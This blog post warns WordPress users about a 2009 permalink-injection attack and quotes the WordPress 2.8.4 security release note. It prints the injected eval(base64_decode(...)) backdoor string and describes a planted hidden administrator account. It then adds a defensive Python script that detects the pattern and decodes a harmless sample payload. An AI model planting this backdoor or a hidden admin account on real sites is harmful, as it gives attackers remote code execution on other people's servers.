This is an alert for WordPress.org users running self-hosted blogs. You may be under attack!

If you’re not using WordPress 2.8.4, you’d better upgrade immediately, or you’re going to face a very trying weekend, according to the heads-up from the Mashable blog.

The Mashable blog got the warning from Lorelle on WordPress today.

According to Lorelle’s warning post, there are two clues that indicate an attack:

  1. There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords to look for are “eval” and “base64_decode.” URL-decoded, that fragment is PHP that executes whatever base64-encoded code the attacker sends in the HTTP Referer header, so the permalink itself has become a remote backdoor.
  2. The second clue is a “back door” in the form of a “hidden” Administrator account. Check your site’s user list for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account.
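A small triage script for the two clues above, as an added example that is not part of Lorelle’s post, Mashable’s coverage, or WordPress itself. It URL-decodes a permalink and looks for the eval/base64_decode fragment, reports which request header the fragment uses as its command channel, shows what a base64 Referer header would decode to, and flags administrator accounts that are not on your own list. The permalink string, the Referer value, and the user rows are constructed samples; the wp_options and wp_users table names mentioned in the comments are the standard WordPress schema, but the rows here are not pulled from a real database.

```python
"""Triage checks for the two WordPress attack indicators (added example).

Assumed inputs (constructed samples, not real site data):
  - SAMPLE_PERMALINK: the injected permalink shape from the warning post.
  - SAMPLE_REFERER:   a harmless base64 string standing in for an attacker's
                      Referer header.
  - SAMPLE_USERS:     rows shaped like `SELECT user_login, display_name` from
                      wp_users, with the role taken from wp_usermeta.
On a real site the permalink comes from
  SELECT option_value FROM wp_options WHERE option_name = 'permalink_structure';
"""
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample: the permalink shape quoted in the warning post.
SAMPLE_PERMALINK = (
    "example.com/category/post-title/"
    "%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"
)

# Constructed sample: what an attacker's Referer header would look like.
# The backdoor base64-decodes the header and evals the result as PHP.
SAMPLE_PAYLOAD_PHP = "echo php_uname();"
SAMPLE_REFERER = base64.b64encode(SAMPLE_PAYLOAD_PHP.encode()).decode()

# Constructed sample user rows: one legitimate admin, one editor, one planted
# admin that reuses the "Administrator" display name.
SAMPLE_USERS = [
    {"login": "admin", "display_name": "Administrator", "role": "administrator"},
    {"login": "editor1", "display_name": "Editor", "role": "editor"},
    {"login": "admin_bak", "display_name": "Administrator", "role": "administrator"},
]

# Matches eval(base64_decode($_SERVER[<HEADER>])) after URL decoding and
# captures the header name that acts as the command channel.
_BACKDOOR_RE = re.compile(r"eval\(base64_decode\(\$_SERVER\[['\"]?(\w+)['\"]?\]\)\)")


def fully_unquote(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so a double-encoded payload is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_backdoor_permalink(permalink: str) -> bool:
    """True when the decoded permalink carries both eval( and base64_decode(."""
    decoded = fully_unquote(permalink)
    return "eval(" in decoded and "base64_decode(" in decoded


def command_channel(permalink: str):
    """Return the $_SERVER key the backdoor reads (e.g. HTTP_REFERER), or None."""
    match = _BACKDOOR_RE.search(fully_unquote(permalink))
    return match.group(1) if match else None


def decode_referer_payload(referer: str):
    """Show the PHP a given Referer value would hand to eval(); None if the
    value is not valid base64 (an ordinary URL referer fails validation)."""
    if not referer:
        return None
    try:
        raw = base64.b64decode(referer, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def suspicious_users(users, known_admin_logins):
    """Flag administrator logins not in your own list, plus any account that
    shares a display name (a second "Administrator") with another account."""
    by_display_name = {}
    for u in users:
        by_display_name.setdefault(u["display_name"], []).append(u["login"])
    flagged = []
    for u in users:
        unknown_admin = u["role"] == "administrator" and u["login"] not in known_admin_logins
        duplicate_name = (len(by_display_name[u["display_name"]]) > 1
                          and u["login"] not in known_admin_logins)
        if unknown_admin or duplicate_name:
            flagged.append(u["login"])
    return flagged


if __name__ == "__main__":
    print("backdoor permalink:", is_backdoor_permalink(SAMPLE_PERMALINK))
    print("command channel   :", command_channel(SAMPLE_PERMALINK))
    print("referer decodes to:", decode_referer_payload(SAMPLE_REFERER))
    print("suspicious users  :", suspicious_users(SAMPLE_USERS, {"admin"}))
```

Run it against the real permalink_structure value and user list from your database rather than the samples; a clean site reports no backdoor, no command channel, and an empty list of suspicious users.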

Looking back:

On August 12, 2009, the WordPress blog announced the security release of WordPress 2.8.4, explaining the vulnerability it fixed.

I reproduce that post here:

“Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

We fixed this problem last night and have been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.”

Well, better to be safe than sorry. Upgrade to WP 2.8.4 NOW!